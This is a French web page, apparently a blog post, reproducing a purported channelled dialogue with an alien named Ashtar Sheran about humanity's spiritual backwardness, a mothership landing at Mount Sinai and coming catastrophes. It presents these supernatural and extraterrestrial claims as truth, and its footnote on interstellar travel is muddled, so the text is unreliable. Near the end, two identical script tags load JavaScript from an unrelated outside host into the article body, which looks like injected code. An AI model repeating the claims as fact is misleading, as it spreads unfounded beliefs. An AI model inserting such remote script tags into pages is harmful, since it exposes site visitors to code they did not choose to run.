• - ASHTAR SHERAN -

    PAIX AU-DELÀ DE TOUTE FRONTIÈRE

    Ici, votre ami ASHTAR SHERAN vous parle.
    NOUS savons que nos messages ne reçoivent pas une diffusion mondiale comme par exemple, votre Bible. Mais la Vérité a, de tous temps, eu beaucoup de difficulté à " faire un chemin sur votre planète.

    Tu nous salues en tant qu'amis. Beaucoup de personnalités importantes de notre Terre vous considèrent comme des ennemis. Ainsi, nous Pourrions dire qu'amis et ennemis sont face à face ?

    Ashtar Sheran : Nous savons que votre Terre est terrible. (Terra Terribilis) C'est la vraie raison pour laquelle nous nous intéressons à vous. Votre retard spirituel n'est pas harmonisé avec votre développement technique et scientifique. Là réside un terrible danger Pour vous tous et pour large zone de l'Univers. Nous aurions toutes les raisons de vous considérer comme nos ennemis, mais notre évolution nous le permet pas. Nous sentons le devoir d'obéir au Créateur de toute existence nous accomplissons le service qu'il ne peut assurer Lui-même. Nous sommes en quelque sorte le prolongement du bras de Dieu.

    Parce que tous les experts en O V N I enquêtant dans l'entourage des gouvernements ne veulent pas entendre parler de Dieu ou de Mission, il vous considèrent seulement comme des astronautes d'une autre "étoile". Votre technique extraordinaire est étonnante. Pourquoi n'atterririez-vous pas de telle manière que monde entier soit une bonne fois persuadé de votre existence extra-terrestre ?

    Ashtar Sheran : Cela nous exposerait à des dangers qu'il ne faut pas mésestimer. Votre attitude hostile et votre technique de guerre nous empêchent toute prise de contact avec vos dirigeants de quelque importance. Il y a quelques milliers d'années c'était différent. En ce temps-là nous n'avions rien à craindre des hommes terrestre! Nos ancêtres, dont nous sommes nous-mêmes l'incarnation, étaient respectés comme des dieux, bien qu'ils n'en fussent pas.

    Au Mont Sinaï, un grand vaisseau mère put atterrir. De nos jours c'est différent car un tel atterrissage provoquerait une panique mondiale et cela ne nous aiderai guère.

    Est-ce que notre entretien en langue allemande présente pour vous quelque difficulté ?

    Ashtar Sheran : Non, je possède bien cette langue et je n'ai pas besoin d'interprète, comme il est parfois nécessaire. Malheureusement je dois avouer que je suis handicapé pour donner certaines explications très, très importantes, à cause de l'insuffisance de votre vocabulaire. C'est pour cela que j'ai choisi le terme "terribilis" parce que le mot "terrible" ne suffit pas à exprimer la situation épouvantable dans laquelle votre monde se trouve.

    Dans les années passées, je vous avais prévenu de multiples catastrophes venir, le vous avais montré votre inconscience à l'égard de la vie sur votre planète où tout va de travers, et la responsabilité de chacun de vous. Mais cela en vain. Les catastrophes annoncées se sont réalisées et ont tué ou blessé beaucoup, beaucoup de monde. Le malheur n'est pas encore fini.

    Vos avertissements ne sont pas pris au sérieux; ils sont considérés comme du "roman".

    Ashtar Sheran : Nous ne vous menaçons pas, nous vous mettons seulement en garde. Je me permets parfois une critique personnelle.

    Précisément nous, les hommes terrestres, ne pouvons supporter aucune critique, même si elle venait de Dieu Lui-même. De plus nous ne croyons pas à votre existence et bien moins encore à votre Sainte Mission. Il ne nous a pas été possible de prouver votre existence de façon que nul doute subsiste. La raison tient dans le fait que vous vous livrez, en quelque sorte, à un jeu de cache-cache. ?

    Nous recevons, des personnes intéressées par vos activités, beaucoup de lettres et de suggestions sur les différents moyens que vous devriez employer afin de convaincre l'humanité terrestre. Des vols en masse au-dessus du Vatican sont, entre autres, suggérés comme démonstration de votre puissance. Votre supériorité technique est la vraie raison empêchant votre identification. Notre science connaît les distances entre les astres exprimées en années lumière. Vous prétendez venir d'un autre système solaire : la science n'accepte pas la possibilité d'un tel voyage *.

    Donc, à ses yeux, vous n'existez pas. Même si vous aviez la vitesse de la lumière ou des moyens "hyperdrive" (exemple : Tachyon), les distances seraient encore trop grandes pour être franchies.

    * En effet si les habitant de l'étoile Alpha du Centaure, voulaient visiter notre terre, et qu'ils voyagent à la vitesse de la lumière (300.000 kmlseconde) Il leur faudrait 4,5 ans pour venir, ce qui est pratiquement impossible [ici, il y a sûrement une erreur d'interprétation]. Les gens seraient morts avant. Et les problèmes de ravitaillement en combustible, nourriture, air, etc... sont insurmontables. Il faudrait donc que les Extra-terrestres puissent aller à une vitesse 1000 fois ou 10.000 fois plus grande, ce qui est impossible puisqu' Einstein a prouvé mathématiquement que la vitesse de la lumière est une vitesse limite, impossible à dépasser.

    source texte : http://terrenouvelle.ca/ashenseignementspirituel.php
    <script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

    <script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

    votre commentaire


    Suivre le flux RSS des articles de cette rubrique
    Suivre le flux RSS des commentaires de cette rubrique